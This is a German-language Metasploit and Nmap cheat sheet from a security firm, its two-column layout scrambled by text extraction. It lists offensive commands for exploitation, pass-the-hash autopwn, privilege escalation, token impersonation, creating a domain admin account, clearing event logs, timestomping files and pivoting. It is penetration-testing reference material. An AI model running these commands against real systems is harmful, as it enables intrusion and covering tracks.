Sie sind auf Seite 1von 2

Metasploit Cheat Sheet

Vorbereitungsarbeiten und Bedienung des Frameworks Modulanwendung


msf >
set Abfrage des lokalen Datastores: msf > search type:auxiliary <Suchbegriff> Ein Modul suchen
msf >
setg Abfrage des globalen Datastores
msf >
setg RHOST 10.1.1.1 Setzen einer globalen Option msf > use auxiliary/scanner/http/enum_wayback Ein Modul auswählen
msf >
unset RHOST Bestehende Optionen zurück setzen msf auxiliary(enum_wayback) > info Modulinformationen abfragen
msf >
hosts Datenbankabfragen um msf auxiliary(enum_wayback) > show options
msf >
notes Informationen zu ermittelten
msf auxiliary(enum_wayback) > show advanced
msf >
services Hosts, Services, Schwachstellen
msf >
vulns und Credentials abzufragen msf exploit(ms08_067_netapi) > show payloads Mögliche Payloads, Encoder und
msf >
creds msf exploit(ms08_067_netapi) > show encoder Ziele eines Moduls anzeigen
msf >
workspace -a workspace Workspace hinzufügen
msf exploit(ms08_067_netapi) > show targets
msf >
workspace Workspaces anzeigen
msf >
workspace -d workspace Workspace löschen msf auxiliary(enum_wayback) > run Modul anwenden und die Check-
msf > set ConsoleLogging yes Logging vollständig aktivieren msf exploit(ms08_067_netapi) > exploit Funktion nutzen
msf > set SessionLogging yes msf exploit(ms08_067_netapi) > check
msf > set TimestampOutput yes
Webapplikationen analysieren
msf > set LogLevel 5 msf > use Webseitenstruktur erkennen
msf > spool auxiliary/scanner/http/crawler
/root/.msf4/logs/console.log msf > wmap_sites l Webseiten auflisten
msf > save Einstellungen speichern msf > wmap_sites -s 10.8.28.24 Struktur einer Webseite
msf > db_export h Ergebnisse exportieren darstellen
msf > wmap_targets l Ziele auflisten und
Session Mangement und Post Exploitation Phase msf > wmap_targets -t definieren
msf > sessions v Details aller Sessions anzeigen 10.8.28.24
msf > sessions -i <Session ID> In eine Session wechseln msf > wmap_run e Webapplikation analysieren
msf > sessions -c ipconfig Auf allen Sessions einen Befehl absetzen
msf > sessions -s checkvm Auf allen Sessions ein Meterpreter Script absetzen Db_autopwn mit Pass the Hash einsetzen
msf > search type:post Post Exploitation Scripte suchen
msf > setg SMBUser Administrator Erst smb_version nutzen um
meterpreter > run <Tab>+<Tab> Post Exploitation Module innerhalb einer Meterpreter
meterpreter > run <Modulpfad+Modulname> Session anwenden msf > setg SMBPass Port 445 zu ermitteln.
msf > use <Modul> Post Exploitation Module außerhalb einer Meterpreter b2e74449a<snip>:d4e80e6<snip> Den User global setzen,
msf > show options Session anwenden msf > db_autopwn -e -r -p -PI445 den Passwort Hash global
msf > set <Option>
msf > run -m psexec seten.
meterpreter > run winenum -h Windows Enumeration db_autopwn mit einer
Regular Expression auf das
meterpreter > run event_manager -h Event Manager Modul
-c <opt> Clear a given Event Log (or ALL if no Modul einschränken und
argument specified) zudem noch auf einen Port
meterpreter > timestomp ping.exe v Anzeigen der MACE Zeiten: einschränken
meterpreter > timestomp ping.exe -a "02/24/2011 Anpassen der MACE Zeiten:
16:57:50"

Contact: Michael Messner michael.messner@integralis.com


Metasploit Cheat Sheet
Privilege Escalation
Kleine Metasploit Helfer
meterpreter > use priv MS10-015 und von Admin zu System
meterpreter > getsystem h root@bt: /MSF-Path/msf3/tools# Zielsysteme suchen
post/windows/escalate/bypassuac Weitere Escalation Module ./module_targets.rb | grep "Windows.*2003"
post/windows/escalate/ms10_073_kbdlayout Zielports darstellen
post/windows/escalate/ms10_092_schelevator root@bt: /MSF-Path/msf3/tools# ./module_ports.rb
post/windows/escalate/net_runtime_modify root@bt: /MSF-Path/msf3/tools# Disclosure Date
post/windows/escalate/screen_unlock ausgeben
./module_disclodate.rb
post/windows/escalate/service_permissions
root@bt: /MSF-PATH/msf3/tools# Lizenzen ausgeben
meterpreter > use incognito Domain Privilege Escalation mit
meterpreter > list_tokens u Incognito ./module_license.rb
meterpreter > impersonate_token Payloads mit deren
root@bt: /MSF-PATH/msf3/tools#
DOMAIN\\administrator Größe ausgeben
C:\WINNT\system32>net user metasploit PASSWORD Domain Benutzer auf der Windows Shell ./payload_lengths.rb | grep windows\/Meterpreter
/add /domain anlegen
Pivoting
C:\WINNT\system32>net group Organisations-Admins
metasploit /add /domain meterpreter > run netenum -ps -r Weitere Netzwerksegmente
192.168.111.0/24 enumerieren
meterpreter > run arp_scanner -r
Nmap Cheat Sheet 192.168.111.0/24
nmap sS 192.168.1.1 Einfacher Synscan meterpreter > portfwd add -l Port 3389 von entfernten
nmap sS iL /root/Nmap- Einfacher Synscan auf Basis einer 3389 -p 3389 -r 192.168.111.50 Netzwerksegment weiterleiten
Scanfile.txt Adressliste, die aus einer Textdatei meterpreter > portfwd list
geladen wird msf > route add 192.168.111.0 Eine statische Route innerhalb
nmap v sS 192.168.1.1 Synscan im Verbose-Mode 255.255.255.0 5 von Metasploit einrichten
nmap v sS p0-65535 Synscan über alle 65535 Ports msf > route print
192.168.1.1 msf > load auto_add_route Automatisches Einrichten von
nmap v sS O 192.168.1.1 Synscan mit Erkennung des Betriebssystems meterpreter > run autoroute -s neuen Routen
nmap v sS -A 192.168.1.1 Portscan mit Erkennung des 192.168.111.0/24
Betriebssystems, der Serviceversionen,
Durchführung eines Traceroute und des
Skriptscans Arachni einsetzen
nmap -p445 --script=smb-check- Portscan auf Port 445 mit dem Einsatz des root@bt:~# arachni http://10.8.28.8/arachni-test -- Arachni Scanvorgang starten
vulns.nse --script-args=unsafe=1 NSE-Skripts zur Erkennung diverser http-req-limit=5 --report=afr:outfile=arachni-
10.8.28.0/24 Schwachstellen testsite.afr
nmap v sSV -O script=all p0- Portscan auf alle Ports, mit OS- root@bt:~# arachni_web_autostart Arachni Weboberfläche
65535 192.168.1.1 Detection, Servicedetection und allen starten
Skripten root@bt:~# arachni --repload=arachni-testsite.afr - HTML Report erstellen
msf > db_nmap v -sSV -p445 Nmap innerhalb der Metasploit Konsole -report=html:outfile=arachni-testsite.html
10.8.28.0/24 ausführen root@bt:~# arachni --repload=arachni-testsite.afr - Metasploit Report erstellen
-report=metareport:outfile=arachni-testsite.msf
msf > load arachni Arachni Metasploit Plugin
Robert-Bürkle-Straße 3 msf > arachni_load /root/metasploit/arachni- nutzen
testsite.msf
D-85737 Ismaning msf > arachni_autopwn -a m
Integralis Deutschland GmbH Tel.: +49 (0)89 945 73 0
Contact: Michael Messner michael.messner@integralis.com

Das könnte Ihnen auch gefallen